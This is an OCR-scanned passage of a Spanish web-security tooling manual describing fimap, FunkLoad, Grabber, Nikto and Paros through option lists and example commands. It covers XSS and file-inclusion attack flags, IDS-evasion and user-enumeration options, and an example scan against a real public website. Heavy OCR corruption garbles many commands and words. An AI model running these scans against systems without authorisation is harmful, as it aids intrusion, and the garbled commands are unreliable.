without prefix which is reachable by bttp. Example: 

/var/www/payload 

settings[“dynamic_rfi”][“local”][“bttp map”] = None # Tbe bttp url of tbe file witbout prefix wbere 

tbe file is reacbable from tbe web. Example: 

bttp://localbost/pavload 

Aquí está el comando para probar su configuración REI para ver si funciona para explotar enlaces 
vulnerables: 

fimap.py -test-rfi 



44. FunkLoad 


Esta aplicación solo analiza la web en el ordenador donde se está ejecutando este programa. 

FunkLoad es un comprobador web funcional y de carga, escrito en Python, cuyos principales casos 

de uso son; 

• Pruebas funcionales de proyectos web y por lo tanto también pruebas de regresión. 

• Pruebas de rendimiento: al cargar la aplicación web y monitorizar sus servidores, le ayuda a 
identifiear cuellos de botella, brindando un informe detallado de la medición del 
rendimiento. 

• Herramienta de prueba de carga para exponer errores que no surgen en pruebas 
superficiales, como pruebas de volumen o pruebas de longevidad. 

• Herramienta de prueba de estrés para abrumar los recursos de la aplicación web y probar la 
capacidad de recuperación de la aplicación. 

• Redacción de agentes web mediante Scripts de cualquier tarea web repetitiva. 

fl-record - Lanzar un proxy TCPWateh y grabar las actividades después de emitir un script 

FunkLoad o generar una prueba de unidad FunkLoad si se especifica test name. 

El puerto proxy predeterminado es 8090. 

Uso: fl-record [opciones] [test name] 

Opciones 


—versión 

Mostrar el número de versión del programa y 
salir. 

—help, -h 

Mostrar este mensaje de ayuda y salir 

—verboso, -v 

Modo verboso 

—port=PORT, -p PORT 

Especificar el puerto proxy 

-tcp-watch-input=TCPWATCH PATH 
-i TCPWATCH PATH 

Ruta a una captura de tcpwateh existente. 

-loop=LOOP, -1 LOOP 

Modo loop 


Ejemplos 

1. Ejecutar un proxy y crear un caso de prueba FunkLoad, generar test FooBar.py y FooBar.conf. 
Para probarlo: fi-run-test -dV test FooBar.py 

fl-record foo bar 

2. Ejecutar un proxy en el puerto 9090 con salida a stdout 
fl-record -p 9090 

3. Convertir una captura de tcpwateh en un script. 
fl-record -i /tmp/tcpwatch 

fl-credential-ctl - Ejecutar la acción en el servidor XML/RPC 
Uso: fl-credential-ctl config file action 
action: start, startd, stop, restart, status o test 
Opciones 


—versión 

Mostrar el número de versión del programa y salir. 

—help, -h 

mostrar este mensaje de ayuda y salir 

—quiet, -q 

Salida detallada. 





fl-run-test - Lanzar una prueba de unidad FunkLoad 
Uso: fl-run-test [opeiones] file [elass.method|elass|suite] [...] 


Opciones 


—versión 

Mostrar el número de versión del programa y 
salir. 

—help, -h 

Mostrar este mensaje de ayuda y salir 

—quiet, -q 

Salida minima. 

—verbose, -v 

Modo verbose 

—debug, -d 

Modo depuración 

-debug-level=DEBUG_EEVEE 

El nivel de depuración 3 es el más detallado. 

-url=MAIN_URL, -u MAIN URL 

Base de URL a comprobar sin terminar '/' 

-sleep-time-min=ETEST SEEEP TIME MIN 
-m ETEST SEEEP TIME MIN 

Tiempo minimo entre solicitudes 

-sleep-time-max=PTEST SEEEP TIME MAX 
-M ETEST SEEEP TIME MAX 

Tiempo máximo entre solicitudes 

—dump-directory=DUMP DIR 

Directorio para volcar páginas html. 

—firefox-view, -V 

Vista en tiempo real con Eirefox. 

-no-color 

Salida monocroma. 

—loop-on-pages=EOOP STEPS 
-1 LOOPSTEPS 

Hacer un bucle lo más rápido posible sin la 
concurrencia en las páginas, esperar un 
número de página o una porción como 3:5. 

—loop-number=EOOP NUMBER 
-n EOOP NUMBER 

Número de bucles 

—accept-invalid-links 

No fallar si los enlaces css/image no son 
accesibles. 

—simple-fetch 

No cargar enlaces adicionales como css o 
imágenes al obtener una página html. 

—stop-on-fail 

Detener las pruebas en el primer error. 

-regex=REGEX, -e REGEX 

Eos nombres de las pruebas deben coincidir 
con la expresión regular. 

—list 

Sólo se tiene que enumerar los nombres de 
prueba. 

—pause 

Pausa entre solicitudes, presionar ENTER para 
continuar. 


Ejemplos 

1. Ejecutar todos los tests (incluido doctest con python2.4). 
fl-run-test myEile.py 

2. Ejecutar test_suite. 
fl-run-test myEile.py test suite 

3. Ejecutar un único test MyTestCase.testSomething. 
fl-run-test myEile.py MyTestCase.testSomething 




4. Ejecutar todos los métodos de test 'test*' y doctest en MyTestCase. 
fl-run-test myFile.py MyTestCase 

5. Lo mismo contra localhost. 

fl-run-test myFile.py MyTestCase -u tittp://localhost 

6. Ejecutar doctest desde un fichero texto plano (requiere python 2.4). 
fl-run-test myDocTest.txt 

7. Ejecutar doctest con salida de depuración (requiere python 2.4). 
fl-run-test myDocTest.txt -d 

8. Ejecutar el conjunto predeterminado de pruebas y ver en tiempo real cada página que se recupera 
con flrefox. 

fl-run-test myflle.py -V 

9. Ejecutar MyTestCase.testSomething, recargar 100 veces la página 3 sin concurrencia y lo más 
rápido posible. Estadísticas de tiempo de respuesta de salida. Puede hacer un bucle en muchas 
páginas usando slice -1 2: 4. 

fl-run-test myflle.py MyTestCase.testSomething -1 3 -n 100 

10. Ejecutar todas las pruebas que coincidan con alguna regex 
fl-run-test myFile.py -e [Ssjome 

11. Ejecute todas las pruebas que no terminen con xmlrpc. 
fl-run-test myFile.py -e '!xmlrpc$' 

12. Listar todos los nombres de prueba, 
fl-run-test myFile.py —list 

fl-build-report - Analiza un archivo de resultados xml de FunkLoad bench y genera un informe. Si 
hay más de un archivo, los resultados xml se fusionan. 

Uso; fl-build-report [options] xmlflle [xmlflle...] 
o 

Uso: fl-build-report -diflf REPORT PATHl REPORT_PATH2 
Opciones 


—versión 

Mostrar el número de versión del programa y salir. 

—help, -h 

Mostrar este mensaje de ayuda y salir 

—html, -H 

Producir un informe html. 

—with-percentiles, -P 

Incluir los percentiles en las tablas, use 10%, 50% y 
90% para los gráficos. 

—no-percentiles 

Ningún percentil en las tablas muestra los gráflcos 
mínimo, promedio y máximo (solo gdchart). 

-diff, -d 

Crear informe diferencial. 

—output-directory=OUTPUT DIR 
-0 OUTPUT DIR 

Directorio principal para almacenar informes. El 
nombre del directorio del informe se generará 
automáticamente. 

—report-directory=REPORT DIR 
-r REPORTDIR 

Nombre del directorio para almacenar el informe. 

-apdex-T=APDEX_T, -T APDEX T 

Constante Apdex T en segundos, el valor 
predeterminado se establece en 1,5 seg. 


Ejemplos 

1 .ReST renderizado en stdout. 
fl-build-report ñmkload.xml 
2.Crear un informe HTML en / tmp 
fl-build-report —html -o /tmp funkload.xml 




3. Cree un informe HTML que eombine el resultado de la prueba de 3 nodos, 
fl-build-report —html nodel.xml node2.xml node3.xml 

4. Cree un informe difereneial para eomparar 2 informes de baneo de pruebas, requiere gnuplot. 
fl-build-report —diflf /tmp/test_reader-20080101 /tmp/test_reader-20080102 


fl-run-bench - Inieiar una prueba de unidad FunkLoad eomo prueba de carga 

Uso: fl-run-bench [opciones] flle class.method 

Opciones 


—versión 

Mostrar el número de versión del programa y 
salir. 

—help, -h 

Mostrar este mensaje de ayuda y salir 

-url=MAIN_URL, -u MAIN URL 

Base de URL para banco de pruebas 

-cycles=BENCH CACEES 
-c BENCH CYCEES 

Ciclos al banco de pruebas. Se trata de una lista 
de usuarios virtuales simultáneos, para ejecutar 
un banco de prueba con 3 ciclos con 5, 10 y 20 
usuarios, usar: -c 2:10:20 

-duration=BENCH DURATION 
-D BENCH DURATION 

Duración de un ciclo en segundos. 

-sleep-time-min=BENCH SEEEP TIME MIN 
-m BENCH SEEEP TIME MIN 

Tiempo minimo entre solicitudes. 

-sleep-time-max=BENCH SEEEP TIME MAX 
-M BENCH SEEEP TIME MAX 

Tiempo máximo entre peticiones. 

-test-sleep-time=BENCH SEEEP TIME 
-t BENCH SEEEP TIME 

Tiempo entre pruebas. 

-startup-delay=BENCH STARTUP DEEAY 
-s BENCH STARTUP DEEAY 

Retardo de inicio entre threads 

—as-fast-as-possible, -f 

Eliminar los tiempos de suspensión entre 
solicitudes y entre pruebas, acceso directo para 
-mO -MO -tO 

-no-color 

Salida monocromática. 

—accept-invalid-links 

No fallar si los enlaces css/image no son 
accesibles. 

—simple-fetch 

No cargar enlaces adicionales como css o 
imágenes al obtener una página html. 

-label=EABEE, -1 EABEE 

Agregar una etiqueta a esta ejecución de banco 
de pruebas para una identiflcación más fácil. 

—enable-debug-server 

Crear una instancia de un servidor HTTP de 
depuración que expone una interfaz mediante la 
cual los parámetros se pueden modiflcar en 
tiempo de ejecución. 

—debug-server-port=DEBUGPORT 

Puerto en el que el servidor de depuración debe 
ejecutarse durante la prueba 


Ejemplos 

1 .Bench MyTestCase.testSomething usando MyTestCase.conf 
fl-run-bench myFile.py MyTestCase.testSomething 




2. My Teste ase. tests omething Beneh MyTestCase.testSomething en loealhost:8080 eon 2 eielos de 
10 y 20 usuarios durante 30 seg. 

fl-run-beneh -u http://loealhost:8080 -e 10:20 -D 30 myFile.py \ 

fl-monitor-ctl - Ejecutar la acción en el servidor XML/RPC 
Uso: fl-monitor-ctl conflg flle action 
La acción puede ser: start|startd|stop|restart|status|test 
Opciones 


—versión 

Mostrar el número de versión del programa y salir. 

—help, -h 

mostrar este mensaje de ayuda y salir 

—quiet, -q 

Salida detallada 




45. Grabber 


Grabber es un escáner de aplicaciones web. Básicamente detecta algún tipo de vulnerabilidades en 
su sitio web. Grabber es simple, no rápido pero portátil y realmente adaptable. Este software está 
diseñado para escanear sitios web pequeños como personales, foros, etc. No es una aplicación 
grande: tomaría mucho tiempo e inundaria su red. 

Características: 

• Scripting entre sitios 

• Inyección de SQL (también hay un módulo especial de Inyección >SQL ciego) 

• Inclusión de archivos 

• Comprobación de archivos de copia de seguridad 

• Verificación simple de AJAX. Analiza cada JavaScript y obtiene la URL e intenta obtener 
los parámetros 

• Análisis hibrido/pruebas de bola de cristal para aplicaciones PHP usando PHP-SAT 

• Analizador de código fuente de JavaScript: evaluación de la calidad/corrección de 
JavaScript con JavaScript Lint 

• Generación de un archivo [session id, time (t)] para el siguiente análisis de estadisticas. 
Uso: grabber [opciones] 

Opciones: 


-h, —help 

Mostrar este mensaje de ayuda y salir 

-uARCHIVES URL, -url=ARCHIVES_URL 

Dirección a investigar 

-s, —sql 

Buscar la inyección SQL 

-X, —xss 

Realizar ataques XSS 

-b, —bsql 

Buscar la inyección ciega de SQL 

-z, —backup 

Buscar archivos de copia de seguridad 

-d SPIDER, -spider=SPIDER 

Buscar todos los archivos 

-i, —inelude 

Realizar ataques de inserción de archivos. 

-j, —JavaScript 

Probar el código JavaScript 

-c, —crystal 

Prueba de bola de cristal simple. 

-e, —session 

Evaluaciones de sesión 


Es recomendable usar la opción -d X siendo X > 1, ya que de esta manera hace reintentos. 
Ejemplo 

grabber --xss —url http://192.168. 1.224 
grabber —spider 1 —sql —url http://192.168. 1.224 




46. Nikto 


Nikto es un escáner de servidor web de código abierto (GPL) que realiza pruebas exhaustivas contra 
servidores web para múltiples elementos, incluidos más de 6700 archivos/CGIs potencialmente 
peligrosos, verifica versiones desactualizadas de más de 1250 servidores y problemas específicos de 
versiones en más de 270 servidores. También verifica los elementos de configuración del servidor, 
como la presencia de múltiples archivos de indice, las opciones del servidor HTTP e intentará 
identificar los servidores web y el software instalados. Los elementos de escaneo y los 
complementos se actualizan con frecuencia y se pueden actualizar automáticamente. 

Nikto tiene la fúncionalidad para identificar las vulnerabilidades de aplicaciones web como la 
divulgación de información, inyección (XSS/ Script /HTML), recuperación remota de archivos, 
ejecución de comandos e identificación de software). Además del escaneo básico, Nikto permite 
que el probador de penetración se adapte escaneando a un objetivo determinado. Las siguientes son 
algunas de las opciones que puede ser utilizado para escanear: 

• El uso de la opción de linea de comando -T con números de prueba individuales para 
pruebas a tipos especificos. 

• Al usar -t, se puede establecer el valor de tiempo de espera para cada respuesta de prueba 

• Controles de la salida de la pantalla 

• Definición del informe de escaneo que se escribirá en un formato particular 

• Hay otras opciones avanzadas como -mutate para adivinar subdominios, archivos, 
directorios y nombres de usuario, -evasión para omitir el filtro IDS y -Single para el modo 
de prueba individual, que puede utilizar para evaluar su objetivo en profundidad. 

Uso; nikto <opciones> 

Opciones: 

El signo + significa que la opción debe ir acompañada de un valor. 


-ask+ 

Si preguntar acerca de enviar actualizaciones 
-yes Preguntar sobre cada uno (predeterminado) 

-no No preguntar, no enviar. 

- auto No preguntar, solo enviar 

-Cgidirs+ 

Escanear los directorios CGI: "none", "all" o valores como 
"/ cgi / / cgi-a /" 

-config-l- 

Usar el fichero de configuración 

-Display-H 

Activar / desactivar las salidas de la pantalla: 

- 1 Mostrar las redirecciones 

- 2 Mostar las cookies recibidas 

- 3 Mostrar todas las respuestas 200/OK 

- 4 Mostrar las URLs que requieren autenticación 

- D Salida de depuración 

- E Mostrar todos los errores HTTP 

- P Imprimir el progreso en STDOUT 

- S Depurar la salida de IPs y nombres de host 

- V Salida verbose 

-dbcheck 

Comprobar la base de datos y otros archivos clave para los errores de 
sintaxis 




-evasion+ 

Técnica de codificación: 

- 1 Codificación URI aleatoria (non-UTF8) 

- 2 Directorio de autoreferencia (/./) 

- 3 fin prematuro del URL 

- 4 añadir al final una cadena larga y aleatoria 

- 5 Parámetro falso 

- 6 TAB como espaciador de solicitud 

- 7 Cambiar el caso del URL 

- 8 Usar el separador de directorio de Windows (\) 

- A Usar un retomo de carro (OxOd) como espaciador de solicitud 

- B Usar el valor binario OxOb como espaciador de solicitud 

-Format+ 

Guardar el formato del fichero de salida: 

- csv Comma-separated-value 

- htm formato HTML 

- nbe formato Nessus NBE 

- sql Generic SQL (see docs for schema) 

- txt Texto plano 

- xml formato XML 

-Help 

Información de ayuda extendida 

-host-l- 

Host objetivo 

-404code 

Ignorar estos códigos HTTP como respuestas negativas. El formato es 
"302,301". 

-404string 

Ignorar esta cadena en el contenido del cuerpo de la respuesta como 
respuesta negativa. Puede ser una expresión regular. 

-id+ 

Autenticación del host a usar, el formato es id: pass 

-key+ 

Archivo de clave de certificado de cliente 

-list-plugins 

Eistar todos los complementos disponibles, no realizar pmebas 

-maxtime+ 

Tiempo máximo de pmeba por host. Por ejemplo, Ih, 60m, 3600seg 

-mutate+ 

Adivinar nombres de archivos adicionales: 

- 1 Probar todos los archivos con todos los directorios raiz 

- 2 Adivinar para nombres de archivos de contraseñas 

- 3 Enumerar nombres de usuario a través de Apache 

- 4 Enumerar nombres de usuario a través de cgiwrap 

- 5 Intentar forzar los nombres de subdominio de fuerza bmta, suponga 
que el nombre de host es el dominio principal 

- 6 Intentar adivinar los nombres de directorio del archivo de diccionario 
suministrado 

-mutate-options 

Proporcionar información para mutados. 

-nointeractive 

Desactivar las funciones interactivas. 

-nolookup 

Deshabilitar las búsquedas de DNS 

-nossl 

Desactivar el uso de SSE 

-no404 

Desactivar nikto intentando adivinar una página 404 

-Option 

Anular una opción en nikto.conf, puede emitirse varias veces 

-output-l- 

Escribir la salida en este archivo 

-Pause+ 

Pausa entre pruebas (segundos, entero o flotante) 




-Plugins+ 

Lista de plugins a ejecutar (por defecto: ALL) 

-port+ 

Puerto a usar (por defecto 80) 

-RSAcert+ 

Archivo de certificado de cliente 

-root+ 

Añadir al final el valor raíz a todas las solicitudes, el formato es /directory 

-Save 

Guardar respuestas positivas en este directorio 

-ssl 

Forzar modo SSL en puerto 

-Tuning+ 

Ajuste de escaneo; 

- 1 Archivo Interesante / Visto en los registros 

- 2 Configuración errónea / Archivo predeterminado 

- 3 Divulgación de información 

- 4 Inyección (XSS / Script / HTML) 

- 5 Recuperación remota de archivos - Dentro de la raíz web 

- 6 Denegación de Servicio 

- 7 Recuperación remota de archivos - Servidor ancho 

- 8 Ejecución de comandos / Shell remoto 

- 9 Inyección de SQL 

- 0 Carga de archivos 

- a bypass de autenticación 

- b Identificación de software 

- c inclusión de fuente remota 

- d servicio web 

- e Consola Administrativa 

- X Opciones de ajuste inverso, es decir, incluir todas excepto las 
especificadas 

-timeout+ 

Tiempo de espera para solicitudes (predeterminado 10 segundos) 

-Userdbs 

Cargar solo bases de datos de usuarios, no las bases de datos estándar 

- all Deshabilitar dbs estándar y cargar solo dbs de usuario 

- tests Deshabilitar solo las pruebas de la base de datos y cargue las 
pruebas de prueba 

-useragent 

Anula el agente de usuario predeterminado 

-until 

Ejecutar hasta el tiempo o la duración especificada 

-update 

Actualizar bases de datos y plugins de CIRT.net 

-useproxy 

Usar el proxy definido en nikto.conf o el argumento 
http://server:port 

-Versión 

Imprimir plugin y las versiones de base de datos 

-vhost-l- 

Virtual host (para encabezado de Host) 


Características interactivas 

Durante el proeeso de escaneo, Nikto permite la interacción del usuario para diferentes acciones 
sobre la ejecución activa simplemente presionando determinadas teclas mientras se ejecuta el 
comando, se pueden obtener diferentes resultados que pueden ser útiles para obtener 
información detallada en un momento dado. Las opciones contenidas en Nikto para la interacción 
con el usuario en el transcurso del escaneo son; 


Espacio 

Estado actual del escaneo 

V 

Activar o desactivar el modo Verbose 





d 

Activar o desactivar el modo de depuración 

e 

Activar o desactivar los mensajes sobre informes de error 

P 

Activar o desactivar los mensajes sobre el progreso de los informes 

r 

Activar o desactivar los mensajes sobre las redirecciones en la pantalla 

c 

Activar o desactivar los mensajes sobre las cookies en la pantalla 

0 

Activar o desactivar los mensajes sobre las peticiones correctas (código 200) 

a 

Activar o desactivar los mensajes sobre los intentos de autenticación 

q 

Finalizar la ejecución de Nikto 

N 

Continuar con el dispositivo siguiente y si no existe, finalizar la ejecución 

P 

Pausar la ejecución 


Plugins 

Plugin; tests 

Nikto Tests - Prueba de dispositivo con las pruebas estándar de Nikto 
Opciones: 

• all: Para indicar si se deben verificar todos los archivos con todos los directorios 

• passfiles: Para indicar si se deben buscar archivos de contraseña comunes 

• report: Informar un estado después del número de pruebas superado 

• tids: Un rango de testids que solo se ejecutarán 

Plugin: report nbe 

NBE reports - Produce un informe NBE 
Plugin: origin refiection 

CORS Origin Reflection - Comprobar si un encabezado de origen determinado se refleja en un 
encabezado Access-Control-Allow-Origin 

Plugin: cookies 

HTTP Cookie Internal IP - Busca direcciones IP internas en las cookies devueltas desde una 
solicitud HTTP 

Plugin: dictionary 

Dictionary attack - Intentos de ataque de diccionario directorios / archivos comúnmente conocidos 
Opciones: 

dictionary: Rutas de diccionario a buscar, 
method: Método a usar para enumerar. 

Plugin: negotiate 

Negotiate - Comprueba el mod negotiation MultiViews. 

Plugin: content search 

Conten! Search - Buscar el contenido resultante para las cadenas interesantes 
Plugin: report html 

Report as HTME - Produce un informe HTML 


Plugin: paths 

Path Search - Mire las rutas de enlace para ayudar a rellenar las variables 




Plugin; report xml 

Report as XML - Produce un informe XML 


Plugin: report sqlg 

Generic SQL reports - Produce insereiones SQL en una base de datos genériea. 

Plugin: dir traversal 

Direetory Traversal - Verifiea las aplieaeiones/servidores en busca de vulnerabilidades transversales 
de directorio. 

Plugin: report csv 

CSV reports - Produee un informe CSV 
Plugin: sitefiles 

Site Files - Busear arehivos interesantes basados en la IP / nombre del sitio 
Plugin: embedded 

Embedded Deteetion - Comprueba si el dispositivo es un servidor ineorporado. 

Plugin: elientaeeesspolicy 

elientaccesspoliey.xml - Comprueba si existe un arehivo de aeeeso de eliente y si contiene una 
entrada eomodin. 

Plugin: doeker_registry 

doeker registry - Busque el registro de doeker 

Plugin: headers 

HTTP Headers - Realiza varias eomprobaeiones eontra los eneabezados devueltos por una solieitud 
HTTP 

Plugin: favieon 

Favieon - Comprueba el favieon del servidor web eon los favieons eonoeidos. 

Plugin: robots 

Robots - Comprueba si hay algo dentro del arehivo robots.txt y lo analiza en busea de otras rutas 
para pasar a otras seeueneias de eomandos. 

Options: 

noeheek: Desaetivar la eomprobaeión de entradas en el fiehero robots. 

Plugin: dishwasher 

dishwasher - Busque la vulnerabilidad transversal del direetorio de dishwasher. 

Plugin: apaeheusers 

Apaehe Users - Comprueba si podemos enumerar nombres de usuario direetamente desde el 

servidor web 

Options: 

size: Tamaño máximo del usuario si se apliea fuerza bruta 

home: Busear ~user para enumerar 

egiwrap: Usuario egi-bin/egiwrap para enumerar 

dietionary: Nombre de arehivo para un arehivo de diceionario de usuarios 
enumérate: Indiear si se intenta enumerar usuarios 



Plugin; report text 

Text reports - Produce un informe de texto plano. 


Plugin: egi 

CGI - Enumera los posibles direetorios CGI 
Plugin: ssl 

SSL and eert eheeks - Realizar eomprobaeiones en SSL / Certifieados 
Plugin: apaehe expeet xss 

Apaehe Expeet XSS - Comprueba si los servidores web tienen una vulnerabilidad CSX a través del 
eneabezado Expeet: HTTP 

Plugin: reportjson 

JSON reports - Produee in informe JSON 
Plugin: put del test 

Put/Delete test - Intenta eargar y eliminar arehivos a través de los métodos HTTP PUT y DELETE. 
Plugin: shellshoek 

shellshoek - Busque la vulnerabilidad bash 'shellshoek'. 

Options: 

uri: URL a investigar 
Plugin: httpoptions 

HTTP Options - Realiza una variedad de eomprobaeiones eontra las opeiones HTTP devueltas 
desde el servidor. 

Plugin: auth 

Guess authentieation - Intentar adivinar la autentieaeión realm 
Plugin: multiple index 

Múltiple Index - Comprueba múltiples arehivos de indiee 
Plugin: strutshoek 

strutshoek - Busea la vulnerabilidad 'strutshoek'. 

Plugin: parked 

Parked Deteetion - Comprueba si el dispositivo está estaeionado en un registrador o en una 
ubieaeión de anuneios. 

Plugin: siebel 

Siebel Cheeks - Realiza un eonjunto de eomprobaeiones eontra una aplioaeión Siebel instalada 
Options: 

enumérate: Indiear si intentará enumerar las aplieaeiones eonoeidas 
languages: Lista de lenguajes 
applieation: Aplieaeión a ataear 
applieations: Lista de aplieaeiones 

Plugin: domino 

IBM/Lotus Domino Speeifie Tests - Realiza una seleeeión de pruebas espeeifieas de IBM/Louts 
Domino para identifiear arehivos espeeifieos de Domino aeeesibles sin autentieaeión y la versión 



del servidor 


Plugin: mslO OVO 

https://does.mierosoft.eom/en-us/seeurity-updates/seeuritybulletins/2010/msl0-070 Cheek- 
Determinar si un sitio es vulnerable a https://does.mierosoft.eom/en-us/seeurity- 
updates/seeuritybulletins/2010/msl 0-070 

Plugin: outdated 

Outdated - Comprueba si el servidor web es la última versión. 

Plugin: drupal 

Drupal Speeifie Tests - Realiza una seleeeión de pruebas drupal espeeífieas 
Options: 

path: Ruta básica para los módulos. 

0: Decir si enumerar los módulos o no 

Plugin: fdeops 

File Operations - Guarda los resultados en un fichero de texto. 

Plugin: msgs 

Server Messages - Comprueba la versión del servidor contra problemas conocidos. 

Ejemplo 

nikto -h forocoches.com 

nikto -Display 1234EP -o report.html -Formal htm -Tuning 123bde -host 192.168.0.102 



47. Paros 


Se trata de un proxy HTTP/HTTPS basado en Java para evaluar la vulnerabilidad de una aplieación 
web. Admite la edición/visualizaeión de mensajes HTTP sobre la mareha. Otras earacterísticas 
incluyen arañas, certificado de cliente, encadenamiento de proxy, escaneo inteligente para 
inyecciones de XSS y SQL, etc. 


Uso; paros 

Esto abrirá la ventana del Paros y antes de pasar por cualquier práctica, se debe configurar un proxy 
local con la dirección IP y puerto 127.0.0.1:8080. Para ello ir a la opción Tools y dentro de ella 
Options. Esto permitirá modificar la configuración de la conexión, los valores del proxy local, la 
autenticación HTTP y otra información relevante. 

Ahora hacer los mismo con el navegador que se va a utilizar favorito, es decir, establecer que las 
webs que se visiten, pasen por esye proxy que se ha establecido en paros. 

Eas principales funciones de paros son 

• Atrapar solicitudes y respuesta HTTP 

• Spider 

• Scanner 

En la pantalla principal hay las siguientes opciones 

• Elle. En esta opción hay la posibilidad de crear y abrir sesiones, guardar los datos de la 
sesión, exportar los mensajes y las respuestas a un fichero y en Properties, describir la sesión 
con una descripción. 

• Edit. En esta opción, se puede hacer búsqueda, extraer un patrón en una sesión y activar el 
seguimiento de la sesión con una cookie. 

• View. En esta opción hay 3 posibilidades: Enable Image in History, Eilter History by 
Request y Eilter History by Responso 

• Analyse. En esta opción, se puede ejecutar el spider y el escaneo, y en este caso, se puede 
establecer su política de escaneo, abriendo la ventana correspondiente con sus distintas 
posibilidades. 

• Report. Esta opción es para visualizar los distintos informes. 

• Tools. En esta opción, hay las posibilidades siguientes: Eilter, Encoder/Hash, Manual 
Request Editor, Check for Updates y Options. Ea opción Eilter se explica más adelante. Ea 
opción Encoder/Hash permite codificar y descodificar cadenas de texto. Ea opción Manual 
Request Editor permite la edición de las solicitudes y las respuestas. Ea opción Check for 
Upadates es para actualizar el paros. Ea opción Options permite modificar las opciones de la 
conexión, del proxy local, de la autenticación, de los certificados, de la visualización, del 
atrapado, del spider y del escaneo. 

47.1. Trap requesl/response HTTP 

paros puede atrapar y modificar manualmente las solicitudes/respuestas HTTP y HTTPS. Todos los 
datos HTTP y HTTPS que pasan por paros pueden ser atrapados y modificados. 

1. Trap request 

Se trata de atrapar las solicitudes y para ello simplemente activar la casilla " Trap Request" en la 
pestaña "Trap" y todas las solicitudes quedarán atrapadas. Se puede modificar el contenido de estas 



solicitudes en el área de texto “Header/Body” y haeer elic en el botón "Continué" para eontinuar, es 
deeir, enviar la solieitud modifieada. Tener en cuenta que hay un botón "Tabular View" en la 
esquina inferior dereeha. Este botón solo se puede usar euando la easilla de verifieaeión "Trap 
Request" está aetivada y hay algo de texto en el área de texto "Body". Se utiliza para eonvertir la 
consulta HTTP POST en forma de tabla para su fácil edición. Después de modifiear los parámetros, 
puede haeer che en el botón "Original View" y volver a la pantalla anterior eon la solicitud 
actualizada. 

2. Trap responso. 

Se trata de atrapar las respuestas y para ello aetivar la easilla "Trap Responso" en la pestaña "Trap" 
y todas las respuestas quedarán atrapada. Se puede modifiear el contenido en el área de texto 
Header/Body y haeer elic en el botón "Continué" para eontinuar. 

Tener en cuenta que el botón "Tabular View" solo es útil en la oaptura de las solioitudes HTTP(S) 
POST. 

47.2. Spider 

Spider se utiliza para rastrear los sitios web y reunir tantos enlaoes URL como sea posible. Esto 
permite tener una mejor comprensión del árbol de jerarquía del sitio web en pooo tiempo antes de la 
navegaoión manual. Sus funoionalidades inoluyen: 

• Rastrear sitios web HTTP y HTTPS basados en una URL determinada 

• Cookie de soporte 

• Agrega automátieamente los enlaoes URL al árbol de jerarquía del sitio web para su 
posterior análisis. 

Como es solo un spider simple, tiene las siguientes limitaoiones: 

• Los sitios web SSL eon oertifioado no válido no se pueden rastrear 

• Muti-threading no soportado 

• Algunas URL malformadas en páginas HTML no se pueden reoonooer 

Además las URL generadas por Javasoript no se pueden enoontrar eon este spider. Sin embargo 
estas URL se pueden encontrar y agregar al árbol de jerarquía a través de la navegaoión manual. 

47.3. Scanner 

Esta función consiste en esoanear el servidor según la jerarquía del sitio web y así se puede verificar 
si hay alguna configuración incorrecta del servidor. A veoes determinadas rutas de URL no pueden 
ser enoontradas y examinadas automátieamente porque algunos enlaoes URL solo se pueden 
mostrar después de un inioio de sesión válido. 

Para utilizar esta fúnoión, primero se debe navegar por el sitio web y en el oaso que se requiera un 
inoio de sesión en un sitio web, se debe aetivar la misma, paros oonstruirá automátieamente un árbol 
de jerarquía del sitio web y entonoes se puede haeer lo siguiente; 

• Si desea esoanear todos los sitios web en el árbol, se puede haeer olio en el elemento del 
menú "Tree" => • "Sean All" para aetivar el esoaneo. 

• Si solo desea esoanear un sitio web en el árbol, se puede haeer dio en ese sitio en el panel 
del árbol y haeer olio en el elemento del menú "Tree" => "Sean seleotedNode". También se 
puede haeer olio con el botón dereoho en la vista de árbol y elegir las opoiones. 

Aotualmente, Paros haoe las siguientes oomprobaoiones: 



• HTTP PUT permitido: verifica si la opción PUT está habilitada en los directorios del 
servidor 

• Directorio indexable: verifica si los directorios del servidor pueden ser navegables. 

• Existencia de archivos obsoletos: comprueba si existen archivos obsoletos 

• Cross-site scripting: comprueba si se permiten cross-site scripting (XSS) en los parámetros 
de consulta 

• Archivos predeterminados en el servidor websphere: comprueba si existen archivos 
predeterminados 

Tener en cuenta que todas las comprobaciones anteriores se basan en las URL de la jerarquía del 
sitio web, esto significa que el escáner verificará cada URL para cada vulnerabilidad. En 
comparación con otros escáneres web que simplemente hacer un escaneo blink sin jerarquía de 
sitios web, este resultado de escaneo es más preciso. 

47.4. Filter 

Esta opción se activa en la pestaña Tools y el uso de los filtros es : 

• Para detectar y alertar la aparición de ciertos patrones predefinidos en el mensaje HTTP. Por 
lo tanto no necesita atrapar cada mensaje HTTP y buscar el patrón que se desee. 

• Para registrar la información que interesa, por ejemplo, las cookies. 

A medida que los filtros interceptan y examinan cada mensaje HTTP(S) sobre la marcha habilitando 
todos los filtros, se podría reducir la velocidad del proxy. Por lo tanto se recomienda activar solo los 
filtros que se necesitan. De forma predeterminada, solo el filtro LogCookie está habilitado después 
del inicio. 

Paros tiene los siguientes filtros: 

• Avoid browser cache 

• Log unique Get queries into file: registra todas las consultas HTTP(S) GET enviadas desde 
el navegador en el fichero get.xls, que se guardará en el directorio del programa paros. 

• Log unique Post queries into file: registra todas las consultas HTTP(S) POST enviadas 
desde el navegador en el fichero post.xls que se guardará en el directorio del programa 
paros. 

• Log request and responso into file: registra todos los mensajes en el en el fichero 
message.xls, que se guardará en el directorio del programa paros. 

• Replace HTTP request header using defined pattern 

• Replace HTTP request body using defined pattern 

• Replace HTTP responso header using defined pattern 

• Replace HTTP responso body using defined pattern 

• Detect insecure or potentially mabcious content in HTTP 

• Log cookies sent by browser: registra todas las cookies aceptadas enviadas desde el 
navegador al servidor en el panel inferior. 

• Detect and alert ‘Set-Cookie’ attemp in HTTP responso: alerta sobre el intento de 
"Set-Cookie" en la respuesta HTTP y permite modificarlo. 

• Change user agent to other browsers 

47.4.1. Otras funciones 

Además de las funciones principales, hay otras caracteristicas en paros: 



• Soporte de eertificado de cliente; algunas aplicaciones web requieren certificado de cliente. 
Muchos proxies man-in-the-middle no pueden funcionar en esta situación porque no pueden 
almacenar el certificado del cliente para el handshaking o el inicio de sesión. Al importar el 
certificado de cliente requerido en paros justo antes del handshaking o inicio de sesión, 
puede interceptar y modificar los datos HTTP con aquellas aplicaciones web que requieren 
certificado de cliente. Para usar esta función, se puede hacer clic en Menú => Tools => 
Certificate 

• Registre las solicitudes y respuestas HTTP sobre la marcha. El tiempo de respuesta también 
